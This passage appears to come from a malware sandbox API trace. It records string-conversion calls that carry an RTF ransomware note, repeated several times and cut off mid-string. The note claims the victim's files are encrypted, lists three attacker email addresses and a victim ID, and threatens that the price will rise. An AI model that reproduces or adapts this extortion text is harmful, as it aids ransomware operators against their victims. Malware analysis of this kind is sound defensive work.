\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x25ad0d8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st 